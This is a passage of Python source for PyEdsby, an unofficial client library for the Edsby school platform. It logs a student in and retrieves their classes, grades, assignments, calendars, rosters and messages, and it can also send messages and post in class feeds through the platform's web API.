(c) 2017 Charlton Trezevant - www.ctis.me
MIT License
This code is well documented. You can find supplementary
documentation, as well as the documentation included here
in the PyEdsby wiki: https://github.com/ctrezevant/PyEdsby/wiki
The Edsby trademark and brand are property of CoreFour, Inc.
This software is unofficial and not supported by CoreFour in any way.
"""
class Edsby(object):
def __init__(self, **kwargs):
    '''
    kwargs:
      host (required): hostname of the Edsby instance.
      headers (optional): HTTP headers to use instead of the built-in defaults.
      meta (optional): pre-fetched instance metadata; only 'nid' is required.
      session (optional): an existing requests Session (used for cookies only).
      username + password (optional): when both are given, login() is called
      immediately after setup.
    '''
    self.edsbyHost = kwargs['host']
    if 'headers' in kwargs:
        self.globalHeaders = kwargs['headers']
    else:
        # Default browser-like headers; the referer must match the instance host.
        self.globalHeaders = {
            'user-agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0 Safari/601.1',
            'referer': 'https://'+self.edsbyHost+'/',
            'accept': '*/*',
            'accept-language': 'en-US,en',
            'dnt': '1',
            'x-requested-with': 'XMLHttpRequest'
        }
    # You can also pass instance metadata, if you want to create PyEdsby instances a little faster.
    # All the class really needs is a dict with the nid property set, so you can pass something like
    # {'nid': 'your nid'} and not break anything.
    if 'meta' in kwargs:
        self.instanceMeta = kwargs['meta']
    else:
        self.instanceMeta = self.parseInstanceMetadata()
    # You can pass a Session instance you've already made to PyEdsby, if you don't want it to create its own.
    # Note that we only use sessions to keep track of cookies, so if you also want to use custom headers make sure
    # that you pass those in.
    if 'session' in kwargs:
        self.session = kwargs['session']
    else:
        self.session = self.getSession()
    # You can also pass the constructor your credentials, if you'd rather not call the login method.
    if 'username' in kwargs and 'password' in kwargs:
        self.login(username=kwargs['username'], password=kwargs['password'])
"""
Authenticates the session and retrieves instance and student metadata
"""
def login(self, **kwargs):
self.authData = self.getauthData((kwargs['username'], kwargs['password']))
self.studentData = self.sendAuthenticationData()
return True
"""
Overwrites the session and clears all authentication keys/student metadata,
which deauthenticates your session (effectively logging you out).
"""
def logout(self):
self.endSession()
self.clearStudentData()
return True
"""
Allows headers to be changed after instantiation (for imitating a mobile device, for example)
"""
def setHeaders(self, headers):
self.globalHeaders = headers
"""
Returns the HTTP headers currently in use for all API calls
"""
def getHeaders(self):
return self.globalHeaders
"""
Allows cookies to be manually set or modified (initially set automatically by
the getSession method)
You can either pass a dict or a cookiejar. If you pass a dict, then the method will automatically
convert it into the cookiejar format.
"""
def setCookies(self, cookies):
if isinstance(cookies, dict):
cookies = requests.utils.cookiejar_from_dict(cookies)
self.session.cookies = cookies
"""
Allows retrieval of cookies currently in use for all API calls
"""
def getCookies(self):
return self.session.cookies.get_dict()
"""
May be used to retrieve student metadata (nid, unid, name, and so on)
"""
def getStudentData(self):
return self.studentData
"""
This method overwrites all internally held student data.
"""
def clearStudentData(self):
self.authData = None
self.studentData = None
return True
"""
Can be used to modify the internally held student metadata
"""
def setStudentData(self, studentData):
self.studentData = studentData
"""
This begins a session, retrieving cookies that we'll use later. Don't call this if you've already called
login, as it will overwrite the cookies.
"""
def getSession(self):
    '''
    Begin a session by hitting the login-form endpoint.
    NOTE(review): this returns the requests *Response*, not the Session it was
    made with — downstream code (getCookies/setCookies) only touches `.cookies`,
    which both types expose, so behavior holds. Confirm before refactoring.
    Don't call this after login, as it will discard the authenticated cookies.
    '''
    return requests.Session().get('https://'+self.edsbyHost+"/core/login/"+str(self.instanceMeta['nid'])+"?xds=loginform&editable=true",headers=self.getHeaders())
"""
This method overwrites the current session, which effectively logs the user out.
"""
def endSession(self):
    '''
    Overwrite the current session with a fresh, unauthenticated one,
    which effectively logs the user out.
    '''
    self.session = self.getSession()
"""
Scrapes the InstanceMeta dict from your Edsby instance.
"""
def parseInstanceMetadata(self):
    '''
    Scrape the instance metadata dict out of the Edsby landing page by cutting
    the argument object out of the page's openSesame(...) call and splitting it
    into key/value pairs.
    '''
    page = requests.get('https://'+self.edsbyHost, headers=self.getHeaders()).text
    # Everything after "openSesame(" up to the first closing brace is the metadata object.
    payload = page[page.find('openSesame(') + 12:]
    pairs = payload[:payload.find('}')].split(',')
    parsed = dict()
    for pair in pairs:
        # Each entry looks like "base:'BasePublic'": split off the key, strip
        # stray double quotes, then take everything past "key:'" as the value.
        key = pair[0:pair.find(':')].strip()
        key = key.replace('"', '')
        value = pair[len(key) + 3:].replace("'", '')
        parsed[key] = value
    return parsed
"""
Returns a dict of useful metadata about your Edsby instance.
This is required, as we'll need the instance NID to authenticate the user.
{
nid: instance NID,
uid: instance NID,
version: 17431,
base: 'BasePublic',
compiled: 1492092324,
app: 'us2',
system: 'us2'
}
"""
def getInstanceMetadata(self):
return self.instanceMeta
"""
Retrieves a variety of authentication data from Edsby (server nonces, keys, etc)
Which are then used by sendAuthenticationData to complete user authentication.
"""
def getauthData(self, loginData):
    '''
    Fetch crypt/nonce data from Edsby and assemble the login form payload.
    loginData is a (username, password) tuple.
    '''
    url = 'https://'+self.edsbyHost+'/core/node.json/'+str(self.instanceMeta['nid'])+'?xds=fetchcryptdata&type=Plaintext-LeapLDAP'
    self.authData = requests.get(url, cookies=self.getCookies(), headers=self.getHeaders()).json()['slices'][0]
    return {
        '_formkey': self.authData['_formkey'],
        'sauthdata': self.authData['data']['sauthdata'],
        'crypttype': 'LeapLDAP',
        'login-userid': loginData[0],
        'login-password': loginData[1],
        'login-host': self.edsbyHost,
        'remember': 1
    }
"""
This is the final step in the authentication process, which completes user login and returns
student metadata returned by Edsby
"""
def sendAuthenticationData(self):
    '''
    Final login step: POST the payload built by getauthData, capture the
    authenticated session cookie, and return a summary of the student
    metadata Edsby sends back. Raises LoginError on authentication failure.
    '''
    studentData = requests.post('https://'+self.edsbyHost+'/core/login/'+str(self.instanceMeta['nid'])+'?xds=loginform&editable=true',data=self.authData,cookies=self.getCookies(),headers=self.getHeaders())
    # Keep only the authenticated session cookie for all subsequent calls.
    cookies = {
        'session_id_edsby': dict(studentData.cookies)['session_id_edsby'],
    }
    self.setCookies(cookies)
    studentData = studentData.json()
    if 'error' in studentData:
        raise LoginError(studentData['errorstr'])
    return {
        'unid': studentData['unid'],
        'compiled': studentData['compiled'],
        'nid': studentData['slices'][0]['nid'],
        'name': studentData['slices'][0]['data']['name'],
        'guid': studentData['slices'][0]['data']['guid'],
        'formkey': studentData['slices'][0]['data']['formkey']
    }
"""
In a browser, this API call would bootstrap the web app. Here, however, we need only
call it update our session state from Edsby's point of view. This has a lot of UI related metadata,
though I haven't explored it in detail.
"""
def getBootstrapData(self):
    '''Fetch the web-app bootstrap payload; also refreshes session state server-side.'''
    url = 'https://'+self.edsbyHost+'/core/node.json/?xds=bootstrap'
    return requests.get(url, cookies=self.getCookies(), headers=self.getHeaders()).json()
"""
This returns a wealth of metadata about the student as a whole,
including classes. This is yet another thing I haven't explored in great detail.
"""
def getBaseStudentData(self):
    '''Fetch the broad student metadata blob (includes classes); largely unexplored.'''
    url = 'https://'+self.edsbyHost+'/core/node.json/'+str(self.studentData['unid'])+'?xds=BaseStudent'
    return requests.get(url, cookies=self.getCookies(), headers=self.getHeaders()).json()
"""
Returns personal information about the student, including their full name,
phone number, address, and registered parents.
"""
def getStudentPersonalInfo(self):
    '''
    Fetch personal information (full name, phone, address, registered parents).
    Returns '' when the response carries no 'data' slice.
    '''
    url = 'https://'+self.edsbyHost+'/core/node.json/'+str(self.studentData['unid'])+'?xds=editPersonalInformation'
    personalInfo = requests.get(url, cookies=self.getCookies(), headers=self.getHeaders()).json()["slices"][0]
    return personalInfo.get('data', '')
"""
Returns the currently active account settings for the user.
"""
def getAccountSettings(self):
    '''Fetch the user's active account settings; '' when no 'data' slice is present.'''
    url = 'https://'+self.edsbyHost+'/core/node.json/'+str(self.studentData['unid'])+'?xds=editSettings'
    userSettings = requests.get(url, cookies=self.getCookies(), headers=self.getHeaders()).json()["slices"][0]
    return userSettings.get('data', '')
"""
Returns raw class data for only the current set of enrolled classes, which looks like:
"r<class RID>": {
"nodetype": 3,
"reltype": 4,
"parentsAllowed": 3,
"nid": <class NID>,
"nodesubtype": 2,
"teacherNid": <teacher NID>,
"fraction": "3/8",
"rid": <class RID>,
"class": {
"data": {
"ShowAverage": "0"
},
"details": {
"info": {
"code": "<school course code>",
"teachernid": <teacher NID>,
"param": "<teacher Name>"
},
"course": "<human readable course name>",
"new": {
"messages": 0,
"results": 0
}
},
"ShowAverage": "0"
},
"studentLock": 2
},
"""
def getRawCurrentClassData(self):
    '''Fetch the raw "classes" container for the current enrollment (BaseStudentClasses).'''
    url = 'https://'+self.edsbyHost+'/core/node.json/'+str(self.studentData['nid'])+'?xds=BaseStudentClasses&match=multi'
    payload = requests.get(url, cookies=self.getCookies(), headers=self.getHeaders()).json()
    return payload['slices'][0]['data']['classesContainer']['classes']
"""
Returns a parsed list of only the classes you're currently enrolled in.
The dict returned appears like so:
"<class NID>": {
"human_name": "<human readable class name>",
"rid": <class RID>,
"course_code": <course code>,
"teacher": {
"name": "<teacher name>",
"nid": '<teacher NID>'
}
"""
def getCurrentClasses(self):
rawCurrentClasses = self.getRawCurrentClassData()
currentClasses = dict()
for className in rawCurrentClasses:
NID = rawCurrentClasses[className]['nid']
humanName = rawCurrentClasses[className]['class']['details']['course']
RID = rawCurrentClasses[className]['rid']
courseCode = rawCurrentClasses[className]['class']['details']['info']['teachernid']
currentClasses[NID] = dict()
currentClasses[NID]['human_name'] = humanName
currentClasses[NID]['rid'] = RID
currentClasses[NID]['course_code'] = courseCode
teacherName = rawCurrentClasses[className]['class']['details']['info']['param']
teacherNID = rawCurrentClasses[className]['class']['details']['info']['teachernid']
currentClasses[NID]['teacher'] = dict()
currentClasses[NID]['teacher']['name'] = teacherName
currentClasses[NID]['teacher']['nid'] = teacherNID
return currentClasses
"""
Returns a list of NIDs for the classes you are currently enrolled in.
"""
def getCurrentClassNIDList(self):
classNIDs = list()
for NID in self.getCurrentClasses():
classNIDs.append(NID)
return classNIDs
"""
Returns raw class data for the current and historical set of classes you're enrolled in, which looks like:
"r<course RID>": {
"nodetype": 3,
"Title": "<human readable name>",
"reltype": 12,
"value": someValue,
"nodesubtype": 2,
"course": {
"class": {
"text": {
"line2": {
"code": "<course code>",
"name": "<teacher name>"
},
"line1": "<human readable name>"
}
},
"basic": {
"text": {
"line1": "<course code>"
}
}
},
"nid": <course NID>,
"rid": <course RID>
}
"""
def getRawClassData(self):
    '''Fetch the raw "classes" dict covering current and historical enrollment (ClassPicker).'''
    url = 'https://'+self.edsbyHost+'/core/node.json/'+str(self.studentData['nid'])+'?xds=ClassPicker&match=multi'
    payload = requests.get(url, cookies=self.getCookies(), headers=self.getHeaders()).json()
    return payload['slices'][0]['data']['classes']
"""
Returns a parsed list of all available classes, both current and previous.
The dict returned appears like so:
"<class NID>": {
"human_name": "<human readable class name>",
"rid": <class RID>,
"course_code": <course code>,
"teacher": {
"name": "<teacher name>",
"nid": '<will always be None when using this method (see below)>'
}
"""
def getAllClasses(self):
rawClassData = requests.get('https://'+self.edsbyHost+'/core/node.json/'+str(self.studentData['nid'])+'?xds=ClassPicker&match=multi',cookies=self.getCookies(),headers=self.getHeaders()).json()['slices'][0]['data']['classes']
classDict = dict()
for className in rawClassData:
NID = rawClassData[className]['nid']
humanName = rawClassData[className]['course']['class']['text']['line1']
RID = rawClassData[className]['rid']
courseCode = rawClassData[className]['course']['class']['text']['line2']['code']
classDict[NID] = dict()
classDict[NID]['human_name'] = humanName
classDict[NID]['rid'] = RID
classDict[NID]['course_code'] = courseCode
classDict[NID]['teacher'] = dict()
classDict[NID]['teacher']['name'] = rawClassData[className]['course']['class']['text']['line2']['name']
# This endpoint does not return NID information for teachers, so we'll set this to None (e.g. null). If you need to
# Retrieve this data, try using the lookUpMessageRecipient method, or alternatively call getCurrentClasses.
classDict[NID]['teacher']['nid'] = None
return classDict
"""
getClassIDList has been renamed to getAllClasses. This shim provides backwards compatibility
for an otherwise breaking change.
"""
def getClassIDList(self):
return self.getAllClasses()
"""
Returns a list of NIDs for all available classes, both current and previous.
"""
def getAllClassNIDList(self):
classNIDs = list()
for NID in self.getAllClasses():
classNIDs.append(NID)
return classNIDs
"""
Retrieves the list of all classes you've historically been enrolled in, and
removes all the classes that you're currently enrolled in.
"""
def getPastClasses(self):
currentClasses = self.getCurrentClassNIDList()
allClasses = self.getAllClasses()
for classNID in list(allClasses):
if classNID in currentClasses:
del allClasses[classNID]
return allClasses
"""
Returns a list of NIDs for the classes you were previously enrolled in.
"""
def getPastClassNIDList(self):
classNIDs = list()
for NID in self.getPastClasses():
classNIDs.append(NID)
return classNIDs
"""
Returns your current average for the given class NID (e.g. 97.4)
"""
def getClassAverage(self, classNID):
    '''Return the current average (e.g. 97.4) for the given class NID, or '' if unavailable.'''
    url = 'https://'+self.edsbyHost+'/core/node.json/'+str(classNID)+'?xds=MyWork&student='+str(self.studentData['unid'])
    classData = requests.get(url, cookies=self.getCookies(), headers=self.getHeaders()).json()['slices'][0]['data']
    if 'loaddata' in classData and 'average' in classData['loaddata']:
        return classData['loaddata']['average']
    return ''
"""
Retrieves all available averages for the classes you're currently enrolled in.
Adds a new property, 'average', to the class dicts returned by the getCurrentClasses() method.
"""
def getCurrentClassAverages(self):
classes = self.getCurrentClasses()
for key in classes:
classes[key]['average'] = self.getClassAverage(key)
return classes
"""
Retrieves all available averages for the classes you're currently enrolled in.
Adds a new property, 'average', to the class dicts returned by the getAllClasses() method.
"""
def getAllClassAverages(self):
classes = self.getAllClasses()
for key in classes:
classes[key]['average'] = self.getClassAverage(key)
return classes
"""
Returns an object containing all assignment metadata for a specified course, ordered by RID
This includes the NID, RID, and weighting (points possible) of the assignments, but not your score.
"""
def getClassAssignmentMetadata(self, classNID):
    '''Fetch assignment metadata (NID, RID, weighting — no scores) for a class, keyed by RID.'''
    url = 'https://'+self.edsbyHost+'/core/node.json/'+str(classNID)+'?xds=MyWork&student='+str(self.studentData['unid'])
    payload = requests.get(url, cookies=self.getCookies(), headers=self.getHeaders()).json()
    return payload['slices'][0]['data']['loaddata']['gradebook']['terms']
"""
Returns an object containing all assignment scores for a specified course, ordered by NID
This includes the NID and points earned on the assignment, but nothing else.
"""
def getClassAssignmentScores(self, classNID, classRID):
    '''Fetch assignment scores (NID -> points earned) for a class.'''
    url = ('https://'+self.edsbyHost+'/core/node.json/'+str(classNID)+'/'+str(classRID)+'/'+str(classNID)
           + '?xds=MyWorkAssessmentPane&unit=all&student='+str(self.studentData['unid'])+'&model=24605449')
    return requests.get(url, cookies=self.getCookies(), headers=self.getHeaders()).json()["slices"][0]["data"]['grades']
"""
Returns an object containing all assignment scores for a specified course, ordered by NID
This includes the NID and points earned on the assignment, but nothing else.
This is different from getClassAssignmentScores in that it does not return all scores, and does so in a mixed
format where score might be a letter grade, or it could be a JSON string that we have to parse into a string
before reading. getClassAssignmentList can handle and process data returned from both of these endpoints
"""
def getMixedFormatClassAssignmentScores(self, classNID, classRID):
    '''
    Fetch assignment scores from the chart endpoint. Unlike
    getClassAssignmentScores, results are mixed-format (letter grades or JSON
    strings) and may be incomplete; getClassAssignmentList can parse both.
    '''
    url = ('https://'+self.edsbyHost+'/core/node.json/'+str(classNID)+'/'+str(classRID)+'/'+str(classNID)
           + '?xds=MyWorkChart&student='+str(self.studentData['unid']))
    return requests.get(url, cookies=self.getCookies(), headers=self.getHeaders()).json()['slices'][0]['data']['loaddata']['grades']
"""
Returns an array of NIDs for assignments that have been published (e.g. are visible) for a
given course
"""
def getClassPublishedAssignments(self, classNID, classRID):
    '''Return the NIDs (as a list of strings) of published/visible assignments for a class.'''
    url = ('https://'+self.edsbyHost+'/core/node.json/'+str(classNID)+'/'+str(classRID)+'/'+str(classNID)
           + '?xds=MyWorkChart&student='+str(self.studentData['unid']))
    published = requests.get(url, cookies=self.getCookies(), headers=self.getHeaders()).json()['slices'][0]['data']['bubbles']['publishedAssessments']
    return published.split(',')
"""
Gathers all available, published assignment data from a specified class, and computes scores for each. Returns an object
with all available data about the assignments (including a computed percentage), ordered by NID.
"<NID>": {
"sdate": "<guess: share date(?)>",
"graded": <1 or 0, whether assignment was graded>,
"weighting": <maximum possible points for assignment or something that makes no sense>,
"rid": <assignment RID>,
"state": "0", <- dunno what this is for
"score": <number of points earned on an assignment>,
"noavg": false, <whether or not the score was averaged?>
"scheme": "gs_outof", <maybe if assignments are points possible/max score?>
"type": "0", <- dunno what this is for
"columns": <maximum possible points for assignment float or dict for multi-part assignment>
"fraction": "number/1", <- dunno what this is for. number looks like an NID(?)
"summative": "1", <- dunno what this is for
"nid": <assignment NID>,
"cdate": "<guess: created date(?)>",
"date": "<guess: date grade was entered(?)>",
"esubmit": <0 or 1, guess: whether assignment was electronically submitted(?)>,
"nodetype": 6, <- dunno what this is for
"name": "<human name>",
"thread": <same as NID>,
"nodesubtype": 3, <- dunno what this is for
"scorePercentage": <computed score percentage>,
"published": "<1 or 0: true or false if assignment was published>"
}
"""
def getClassAssignmentList(self, classNID, classRID):
    '''
    Combine assignment scores and metadata for a class into buckets:
    'assignments' (fully resolved, with a computed scorePercentage where
    possible) plus lists/dicts of entries that are missing scores, weights or
    columns, or whose weighting/columns are inconsistent with the score.
    '''
    scores = self.getClassAssignmentScores(classNID, classRID) # Fetch assignment scores
    metadata = self.getClassAssignmentMetadata(classNID) # Fetch assignment metadata
    assignmentData = {
        'assignments': dict(), # Assignments that have all applicable metadata present
        'no_scores_found': dict(), # Assignments that we haven't found scores for
        'no_weights_found': list(), # Assignments we haven't found weights for
        'no_columns_found': list(), # Assignments we haven't found columns for
        'invalid_weighting': list(), # Assignments that have invalid weighting
        'invalid_columns': list() # Assignments that have invalid columns
    }
    for nid in scores: # Populates assignmentData with NIDs and available assignment scores
        if 'cols' in scores[nid]:
            assignmentData['assignments'][nid] = {'score': scores[nid]['cols']['0']} if '0' in scores[nid]['cols'] else {'score': scores[nid]['cols']}
    # Copy all available assignment metadata to assignmentData dict
    for assg in metadata:
        assignmentNID = str(metadata[assg]['nid'])
        # Copy other keys from metadata obj to compiled assignment data obj
        for key in metadata['r'+str(metadata[assg]['rid'])]:
            if assignmentNID in assignmentData['assignments']: # If we've found metadata for an assignment that we've also found scores for
                assignmentData['assignments'][assignmentNID][key] = metadata[assg][key] # Copy metadata to that entry
            else:
                assignmentData['no_scores_found'][assignmentNID] = dict() # Otherwise, place this metadata in the no_scores_found dict
                for meta in metadata[assg]:
                    assignmentData['no_scores_found'][assignmentNID][meta] = metadata[assg][meta]
    # Copy weighting data, sort assignments without it, calculate percentage scores if possible
    deepcopy_assignmentData = deepcopy(assignmentData)
    for assg in deepcopy_assignmentData['assignments']:
        assignmentNID = str(assg)
        if 'scheme' not in assignmentData['assignments'][assg]:
            del assignmentData['assignments'][assg]
            continue
        if 'weighting' in assignmentData['assignments'][assg]: # If weighting data is present in the metadata we retrieved
            # API sometimes returns a dict, other times returns a JSON string. Figure out which one it is and parse appropriately.
            if isinstance(assignmentData['assignments'][assg]['weighting'], dict): # If dict access weighting prop as a dict
                if '0' in assignmentData['assignments'][assg]['weighting'] and not isinstance(assignmentData['assignments'][assg]['score'], dict):
                    assignmentData['assignments'][assignmentNID]['weighting'] = assignmentData['assignments'][assg]['weighting']['0']
                # BUGFIX: all four length comparisons in this method used
                # "is not" (object identity) instead of "!=" (equality);
                # identity comparison of ints is a CPython caching accident.
                elif len(assignmentData['assignments'][assg]['weighting']) != len(assignmentData['assignments'][assg]['score']):
                    assignmentData['invalid_weighting'].append(assignmentNID)
                else:
                    assignmentData['assignments'][assignmentNID]['weighting'] = assignmentData['assignments'][assg]['weighting']
            elif isinstance(assignmentData['assignments'][assg]['weighting'], basestring): # If string access weighting prop as a dict after running through a JSON parser
                weighting_dict = json.loads(assignmentData['assignments'][assg]['weighting'])
                if '0' in weighting_dict and not isinstance(assignmentData['assignments'][assg]['score'], dict):
                    assignmentData['assignments'][assignmentNID]['weighting'] = json.loads(assignmentData['assignments'][assg]['weighting'])['0']
                elif len(weighting_dict) != len(assignmentData['assignments'][assg]['score']):
                    assignmentData['invalid_weighting'].append(assignmentNID)
                else:
                    assignmentData['assignments'][assignmentNID]['weighting'] = weighting_dict
        else:
            assignmentData['no_weights_found'].append(assignmentNID) # No weighting data available for this entry, file it away
        if 'columns' in assignmentData['assignments'][assg]: # If columns data is present in the metadata we retrieved
            # API sometimes returns a dict, other times returns a JSON string. Figure out which one it is and parse appropriately.
            if isinstance(assignmentData['assignments'][assg]['columns'], dict): # If dict access columns prop as a dict
                if '0' in assignmentData['assignments'][assg]['columns'] and not isinstance(assignmentData['assignments'][assg]['score'], dict):
                    assignmentData['assignments'][assignmentNID]['columns'] = assignmentData['assignments'][assg]['columns']['0']
                elif len(assignmentData['assignments'][assg]['columns']) != len(assignmentData['assignments'][assg]['score']):
                    assignmentData['invalid_columns'].append(assignmentNID)
                else:
                    assignmentData['assignments'][assignmentNID]['columns'] = assignmentData['assignments'][assg]['columns']
            elif not isinstance(assignmentData['assignments'][assg]['columns'], dict) and assignmentData['assignments'][assg]['scheme'] != 'gs_4levelplusminus': # If string access columns prop as a dict after running through a JSON parser
                columns_dict = json.loads(assignmentData['assignments'][assg]['columns'])
                if '0' in columns_dict and not isinstance(assignmentData['assignments'][assg]['score'], dict):
                    assignmentData['assignments'][assignmentNID]['columns'] = json.loads(assignmentData['assignments'][assg]['columns'])['0']
                elif len(columns_dict) != len(assignmentData['assignments'][assg]['score']):
                    assignmentData['invalid_columns'].append(assignmentNID)
                else:
                    assignmentData['assignments'][assignmentNID]['columns'] = columns_dict
        else:
            assignmentData['no_columns_found'].append(assignmentNID) # No columns data available for this entry, file it away
        # Calculate score percentage for assignment
        if 'columns' in assignmentData['assignments'][assg]: # If valid weighting data is present
            if isinstance(assignmentData['assignments'][assg]['score'], (basestring, dict)) is False and 'columns' in assignmentData['assignments'][assg]: # If the score is NOT a letter grade or a multi-part grade (e.g. is numeric), calculate percentage score.
                assignmentData['assignments'][assg]['scorePercentage'] = (float(assignmentData['assignments'][assg]['score'])/float(assignmentData['assignments'][assg]['columns'])) * 100
            elif isinstance(assignmentData['assignments'][assg]['score'], dict):
                if isinstance(assignmentData['assignments'][assg]['columns'], dict):
                    assignmentData['assignments'][assg]['scorePercentage'] = {}
                    for scoreType in assignmentData['assignments'][assg]['score'].keys():
                        if scoreType in assignmentData['assignments'][assg]['columns']:
                            assignmentData['assignments'][assg]['scorePercentage'][scoreType] = (float(assignmentData['assignments'][assg]['score'][scoreType])/float(assignmentData['assignments'][assg]['columns'][scoreType])) * 100
    return assignmentData
"""
Returns a dict with a basic summary of assignments and their grades for a
given course (e.g "human name": "percentage")
"""
def getHumanReadableAssignmentSummary(self, classNID, classRID):
assignments = self.getClassAssignmentList(classNID, classRID)
humanList = dict()
for key in assignments['assignments']:
if 'scorePercentage' in assignments['assignments'][key]:
humanList[assignments['assignments'][key]['name']] = assignments['assignments'][key]['scorePercentage']
else:
humanList[assignments['assignments'][key]['name']] = assignments['assignments'][key]['score'].upper()
return humanList
"""
Retrieves raw, unformatted attendance records from the specified class. I haven't tried to
parse these yet.
"""
def getRawClassAttendanceRecords(self, classID):
return requests.get('https://'+self.edsbyHost+'/core/node.json/'+str(classID)+'?xds=MyWorkChart&student='+str(self.studentData['unid']),cookies=self.getCookies(),headers=self.getHeaders()).json()['slices'][0]['data']['chartContainer']['chart']['attendanceRecords']['data']['right']['records']['incident']
"""
Returns a list of all member students of a class
Say hi to your classmates!
"""
def getClassmates(self, classNID):
classMates = requests.get('https://'+self.edsbyHost+'/core/node.json/'+str(classNID)+'?xds=ClassStudentList',cookies=self.getCookies(),headers=self.getHeaders()).json()
if 'slices' in classMates: # Make sure we got a valid response from the API.
if 'places' in classMates['slices'][0]['data'] and 'item' in classMates['slices'][0]['data']['places']:
return classMates['slices'][0]['data']['places']['item']
else:
return ''
"""
This function calls getCurrentClasses and adds all available roster information
from each class to it.
This is useful if you want roster information for only the current classes you're enrolled in.
"""
def getCurrentClassRosters(self):
rosterData = self.getCurrentClasses()
for NID in rosterData:
rosterData[NID]['classmates'] = self.getClassmates(NID)
return rosterData
"""
This function calls getAllClasses and adds all available roster information
from each class to it.
This is useful if you want historical roster information for ALL classes you've been enrolled in this year.
"""
def getAllClassRosters(self):
rosterData = self.getAllClasses()
for NID in rosterData:
rosterData[NID]['classmates'] = self.getClassmates(NID)
return rosterData
"""
Retrieves the feed of all assignments and messages posted in the feed of a given class NID.
"""
def getClassFeed(self, classNID):
feed = requests.get('https://'+self.edsbyHost+'/core/node.json/'+str(classNID)+'?xds=CourseFeed',cookies=self.getCookies(),headers=self.getHeaders()).json()['slices'][0]['data']
return feed if 'item' in feed else ''
"""
Course calendar- returns calendar entries for the specified course.
"""
def getClassCalendar(self, classNID):
return requests.get('https://'+self.edsbyHost+'/core/node.json/'+str(classNID)+'?xds=CalendarPanel_Class',cookies=self.getCookies(),headers=self.getHeaders()).json()['slices'][0]['data']
"""
Course assignment outline, shows upcoming and historical assignments for the course
"""
def getClassPlan(self, classNID):
return requests.get('https://'+self.edsbyHost+'/core/node.json/'+str(classNID)+'?xds=Course&_context=1',cookies=self.getCookies(),headers=self.getHeaders()).json()['slices'][0]['data']['col1']['outline']['plan']['tree']
"""
Retrieves all current/pending notifications for the student
"""
def getStudentNotifications(self):
return requests.get('https://'+self.edsbyHost+'/core/node.json/'+str(self.studentData['unid'])+'?xds=notifications',cookies=self.getCookies(),headers=self.getHeaders()).json()['slices'][0]['data']
"""
Returns all available calendar data (due/overdue assignments, events, schedules).
By default, returns data for the current month.
Call with a different date (formatted year-month-day) to get calendar data for that month.
"""
def getCalendarData(self, date=date.today().strftime("%Y-%m-%d")):
return requests.get('https://'+self.edsbyHost+'/core/node.json/'+str(self.studentData['unid'])+'?xds=Calendar&targetDate='+str(date),cookies=self.getCookies(),headers=self.getHeaders()).json()["slices"][0]["data"]["caldata"]
"""
Get calendar entries for all upcoming due assignments
"""
def getCalendarDueAssignments(self):
return self.getCalendarData()['due']
"""
Get calendar entries for currently overdue assignments
"""
def getCalendarOverdueAssignments(self):
return self.getCalendarData()['overdue']
"""
Get all available calendar events
"""
def getCalendarEvents(self):
calendar = self.getCalendarData()
for key in list(calendar['common']):
if str(key + '.0') in list(calendar['events']):
calendar['common'][str(key)] = calendar['events'][str(key + '.0')]
return calendar['common']
"""
Returns calendar entries containing school scheduling information
"""
def getCalendarSchedules(self):
return self.getCalendarData()['schedules']
"""
Returns ALL direct Edsby messages from your inbox
"""
def getDirectMessages(self):
return requests.get('https://'+self.edsbyHost+'/core/node.json/'+str(self.studentData['unid'])+'?xds=Messages&_context=1',cookies=self.getCookies(),headers=self.getHeaders()).json()["slices"][0]["data"]["body"]["left"]["items"]["item"]
"""
Sends a direct message to a specified user
the message dict passed to this method should be structured like so:
{
'nodetype': 4.0,
'to': NID of user,
'text': message text,
'filedata': file data(?),
'files': more file data?
}
"""
def sendDirectMessage(self, message):
payload = {
'_formkey':self.studentData['formkey'],
'form-composeBody': str(message['text']),
'form-media-fill-addresources-integrations-integrationfiledata': message['filedata'],
'form-media-fill-addresources-integrations-integrationfiles': message['files'],
'nodetype': message['nodetype'],
}
return requests.post('https://'+self.edsbyHost+'/core/create/'+str(message['to'])+'?xds=MessagesCompose&permaLinkKey=false&scopeState=true&_processed=true',data=payload,cookies=self.getCookies(),headers=self.getHeaders()).json()
"""
Allows you to search for any higher level user (teacher, administrator)
whose name matches or contains a particular string
"""
def lookUpMessageRecipient(self, query):
return requests.get('https://'+self.edsbyHost+'/core/node.json/'+str(self.studentData['unid'])+'?xds=msgUserPicker&pattern='+query+'&noForm=true',cookies=self.getCookies(),headers=self.getHeaders()).json()["slices"][0]["data"]["item"]
"""
Edsby has a built-in website metadata scraper, which it uses to retrieve
various information about links before they're sent off.
{
"type": "link",
"code": 200,
"embedstatus": "complete",
"href": "<website URL>",
"thumbnail": "<website thumbnail>",
"title": "<website title>",
"description": "<meta description of website>"
}
"""
def scrapeURLMetadata(self, classNID, url):
return requests.get('https://'+self.edsbyHost+'/load/embed.json/'+str(classNID)+'?xds=bookMarkPreview&scrape='+requests.utils.quote(url),cookies=self.getCookies(),headers=self.getHeaders()).json()['slices'][0]['data']
"""
Formats the website metadata from the site scraper, preparing it to be included in a message dict.
This dict should become the value of the url property for your message dict (which maps to the
social-shmart-url prop in the Edsby API call)
"""
def formatURLMetadata(self, metadata):
return {
"url": metadata['href'],
"type": metadata['type'],
"code": metadata['code'],
"href": metadata['href'],
"thumbnail": metadata['thumbnail'] if 'thumbnail' in metadata else '',
"title": metadata['title'] if 'title' in metadata else '',
"description": metadata['description'] if 'description' in metadata else '',
"uuid": 6,
"left": {
"thumbnail": metadata['thumbnail'] if 'thumbnail' in metadata else ''
},
"right": {
"title": metadata['title'] if 'title' in metadata else '',
"description": metadata['description'] if 'description' in metadata else ''
}
}
"""
Edsby expects the URL metadata passed in the message dict to be a string, so this method
retrieves the correct metadata, converts the dict to the proper format, and then returns
the formatted dict as a string.
"""
def getFormattedURLMetadataString(self, classNID, url):
metadata = self.scrapeURLMetadata(classNID, url)
return json.dumps(self.formatURLMetadata(metadata))
"""
Posts a message in the class feed. This takes a dict called message, which looks like this:
{
'text': '<the message text>',
'url': '<an optional URL, shows up as a hyperlink in Edsby>',
'pin': 8,
'nodetype': 4,
'node_subtype': 0,
'filedata': '',
'files': '',
}
"""
def postMessageInClassFeed(self, classNID, message):
messageSubmission = {
'_formkey': self.studentData['formkey'],
'social-pin': message['pin'], # 8
'social-shmart-nodetype': message['nodetype'], # 4
'social-shmart-nodesubtype': message['node_subtype'], # 0
'social-shmart-body': message['text'],
'social-shmart-url': message['url'],
